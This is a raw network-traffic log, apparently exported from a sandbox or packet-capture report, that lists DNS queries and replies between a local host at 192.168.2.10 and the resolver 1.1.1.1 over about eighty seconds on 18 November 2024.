                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.617479086 CET5300753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.625433922 CET53530071.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.626003981 CET6238953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.633425951 CET53623891.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.113817930 CET6540553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.121123075 CET53654051.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.122668982 CET5737353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.129301071 CET53573731.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.129780054 CET5371053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.136902094 CET53537101.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.375494957 CET6540353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.382411003 CET53654031.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.486289978 CET5944053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.493922949 CET53594401.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.290910959 CET5525753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.298443079 CET53552571.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.806731939 CET5897953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.905448914 CET53589791.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.521691084 CET5924153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.528554916 CET53592411.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.325238943 CET6087353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.332726955 CET53608731.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.576394081 CET5000853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.583602905 CET53500081.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.571335077 CET5343353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.578593016 CET53534331.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.408695936 CET5081853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.415715933 CET53508181.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.579896927 CET5293453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.587639093 CET53529341.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:33.562392950 CET5929853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:33.569825888 CET53592981.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:34.580204964 CET4953853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:34.587639093 CET53495381.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:35.704005957 CET5794153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:35.803790092 CET53579411.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:36.812973976 CET5800853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:37.005306959 CET53580081.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:38.639296055 CET6247453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:38.646301031 CET53624741.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.151489019 CET6277853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.158921957 CET53627781.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.615215063 CET5399053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.622997046 CET53539901.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:40.637921095 CET4983953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:40.644891024 CET53498391.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:42.895858049 CET5137253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:42.903739929 CET53513721.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:42.904335022 CET6071753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:43.754018068 CET53607171.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.923489094 CET5850453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.930850983 CET53585041.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.682910919 CET6011353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.692023993 CET53601131.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:47.467381954 CET6008753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:47.476150036 CET53600871.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:49.112123966 CET5942353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:49.120292902 CET53594231.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:50.174345016 CET6452553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:50.181557894 CET53645251.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:51.874341965 CET6407853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:51.881726980 CET53640781.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:53.692799091 CET5164653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:53.700316906 CET53516461.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:54.755430937 CET5765153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:54.763137102 CET53576511.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.760298967 CET5067253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.769454956 CET53506721.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.202353954 CET5622353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.208944082 CET53562231.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.868465900 CET5293353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.875849009 CET53529331.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.716553926 CET5456553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.723516941 CET53545651.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.170501947 CET5277653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.178086042 CET53527761.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.203202009 CET5618753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.213181019 CET53561871.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.472573042 CET6311953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.480237007 CET53631191.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.891503096 CET5243053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.898606062 CET53524301.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.143949986 CET6522953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.152344942 CET53652291.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.382317066 CET5602353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.390362978 CET53560231.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.277091026 CET6055653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.284394026 CET53605561.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.749799013 CET5666053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.757179976 CET53566601.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.905889034 CET5145953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.992672920 CET5931253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.999672890 CET53593121.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.510721922 CET53514591.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.029887915 CET5775853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.037442923 CET53577581.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.038110971 CET5645253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.046273947 CET53564521.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.180902004 CET5688553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.188525915 CET53568851.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.997026920 CET5679353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:06.007972956 CET53567931.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:06.766263962 CET5598653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:06.774127007 CET53559861.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.477111101 CET5248253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.484714031 CET53524821.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.990715027 CET5255353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.998799086 CET53525531.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.182025909 CET5034153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.190537930 CET53503411.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.046464920 CET5768953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.054012060 CET53576891.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.934986115 CET5064553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.942346096 CET53506451.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.023171902 CET4931953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.036597967 CET53493191.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.607137918 CET6343553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.614134073 CET53634351.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.537195921 CET5858553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.137264967 CET53585851.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.420738935 CET5890353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.428381920 CET53589031.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.259460926 CET6296953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.267740965 CET53629691.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.631128073 CET5283053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.639168978 CET53528301.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.714334011 CET5604853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.541354895 CET53560481.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.204775095 CET5775753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.211981058 CET53577571.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.415169001 CET6205553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.423075914 CET53620551.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.301273108 CET5711653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.309216976 CET53571161.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.409352064 CET6256153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.416829109 CET53625611.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.831660032 CET5250253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.853405952 CET5120453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.112137079 CET53512041.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.112476110 CET53525021.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.802175045 CET5989553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.996330023 CET53598951.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.336687088 CET5072753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.343938112 CET53507271.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.732163906 CET6544253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.739379883 CET53654421.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.190749884 CET4945453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.200248003 CET53494541.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.230139971 CET6209053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.239907026 CET53620901.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.240436077 CET6082653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.433290958 CET53608261.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.317244053 CET5546953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.426300049 CET53554691.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.081412077 CET6029753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.089092970 CET53602971.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.175071955 CET4977953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.182631016 CET53497791.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.638642073 CET6344153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.646034956 CET53634411.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.022074938 CET5239053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.029798031 CET53523901.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.086400986 CET5522853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.093735933 CET53552281.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.104240894 CET5594053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.111802101 CET53559401.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.956147909 CET4986053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.963135958 CET53498601.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.575366020 CET5148753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.582912922 CET53514871.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.451461077 CET5313053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.459424973 CET53531301.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.227797031 CET5488653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.235960960 CET53548861.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.966519117 CET5380853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.975440025 CET53538081.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.449820995 CET5932953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.458719015 CET53593291.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.830199957 CET5269453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.837781906 CET53526941.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.544085979 CET5831853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.551743031 CET53583181.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.583751917 CET5130753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.592654943 CET53513071.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.444132090 CET6289353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.452166080 CET53628931.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.778419971 CET5792053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.786520958 CET53579201.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.447536945 CET5970753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.454751968 CET53597071.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.781512976 CET5676553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.788609028 CET53567651.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.600795984 CET4934053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.609663963 CET53493401.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.967974901 CET6410853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.975824118 CET53641081.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.002373934 CET5548153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.009241104 CET53554811.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.090488911 CET6180553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.102107048 CET53618051.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.960238934 CET5403353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.967535019 CET53540331.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.057459116 CET5204453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.065696955 CET53520441.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.182837009 CET5369753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.190726042 CET53536971.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.477814913 CET5574553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.485167027 CET53557451.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.119267941 CET5987853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.127571106 CET53598781.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.170864105 CET6357753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.178908110 CET53635771.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.179410934 CET5470553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.187592983 CET53547051.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.077641010 CET5912753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.086406946 CET53591271.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.087145090 CET6387153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.094294071 CET53638711.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.637636900 CET6447153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.644542933 CET53644711.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.626871109 CET6391453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.634712934 CET53639141.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.849276066 CET5006353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.857172966 CET53500631.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.788063049 CET5794653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.794908047 CET53579461.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.111144066 CET5640053192.168.2.101.1.1.1
